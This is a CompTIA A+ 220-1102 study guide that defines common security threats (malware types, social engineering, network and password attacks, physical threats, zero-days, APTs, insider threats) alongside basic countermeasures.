Security Threats for CompTIA A+ 220-1102

Virus: malicious code that attaches to a legitimate program and replicates when the host program runs. Requires user action to spread (running an infected file, opening an email attachment). Worm: self-replicating malware that spreads across networks without user action — exploits OS or application vulnerabilities. Trojan horse: malware disguised as legitimate software. Does not self-replicate. Creates a backdoor or performs malicious actions when executed. Ransomware: encrypts user files and demands payment for the decryption key. Spreads via phishing email, drive-by download, or RDP brute force. Spyware: secretly monitors user activity. Keyloggers: record keystrokes to steal passwords and credit card numbers. Adware: displays unwanted advertisements; often bundled with free software. Rootkit: hides malware by modifying the OS at a low level. Extremely difficult to detect and remove — may require offline scanning or OS reinstallation. Fileless malware: runs in memory without writing files to disk. Uses legitimate OS tools (PowerShell, WMI) for malicious purposes — evades signature-based antivirus.

Social engineering manipulates people rather than exploiting technology. Phishing: fraudulent emails impersonating legitimate organizations to steal credentials or deliver malware. Spear phishing: targeted phishing aimed at specific individuals using personalized information. Whaling: spear phishing targeting executives or high-value individuals. Vishing: voice phishing — phone calls impersonating IT support, banks, or government agencies. Smishing: SMS phishing — text messages with malicious links. Tailgating / piggybacking: following an authorized person through a secured door without using credentials. Shoulder surfing: observing someone's screen or keyboard to steal credentials. Dumpster diving: searching physical trash for sensitive information (passwords written on paper, discarded documents). Impersonation: pretending to be someone else (IT support, executive, vendor) to gain access. Pretexting: creating a fabricated scenario to manipulate the target.

Man-in-the-Middle (MitM) attack: attacker intercepts communication between two parties. Used for credential theft, session hijacking, or data modification. ARP poisoning: sends fake ARP replies to redirect traffic through the attacker's machine (Layer 2 MitM). DNS poisoning: corrupts DNS cache to redirect users to fake websites. On-path attack: modern term for MitM. Evil twin / rogue access point: fake Wi-Fi network with a legitimate-sounding SSID. Users connect thinking it's the real network; attacker intercepts traffic. DoS (Denial of Service): floods a target with traffic to make it unavailable. DDoS (Distributed DoS): DoS from multiple compromised systems (botnet). SQL injection: malicious SQL code inserted into input fields to manipulate database queries. Cross-site scripting (XSS): malicious scripts injected into trusted websites. Replay attack: captured authentication traffic replayed to gain unauthorized access.

Brute force: systematically trying every possible password combination. Slow but guaranteed to succeed given enough time. Dictionary attack: tries common words, phrases, and known password variations. Much faster than brute force. Rainbow table attack: uses pre-computed hash-to-password tables to reverse password hashes quickly. Credential stuffing: uses stolen username/password pairs from one breach to try on other services — works because users reuse passwords. Password spraying: tries one common password (e.g., 'Password1') against many accounts to avoid lockout. Countermeasures: long passwords (15+ characters), complexity requirements, multi-factor authentication, account lockout policies, password managers, salted password hashes (defeats rainbow table attacks).

Unauthorized physical access: most security controls fail if an attacker has physical access to hardware. Theft: laptops, hard drives, phones, network equipment. Hardware keyloggers: USB or PS/2 devices plugged between keyboard and computer to capture keystrokes — invisible to software. Evil maid attack: attacker with physical access modifies hardware or installs malware while the device is unattended. Skimming: card readers placed over ATM or payment terminals to capture card data. Shoulder surfing: viewing screen content in public places. Physical destruction: servers, networking equipment damaged by disgruntled insiders or criminals. Countermeasures: cable locks, equipment cages, security cameras, access controls (badges, PINs), screen privacy filters, full-disk encryption (protects data if device is stolen).

Zero-day vulnerability: security flaw that is unknown to the vendor and has no patch available. Zero-day exploit: attack that targets a zero-day vulnerability. Extremely dangerous because there is no defense other than detection and response. Advanced Persistent Threat (APT): sophisticated, long-term attack campaign often sponsored by nation-states or organized crime. Goal: persistent access to steal data over months or years rather than quick destruction. Insider threat: current or former employee, contractor, or business partner who misuses authorized access. Types: malicious insider (intentional), negligent insider (accidental), compromised insider (credentials stolen). Mitigation: principle of least privilege, separation of duties, user activity monitoring, offboarding procedures.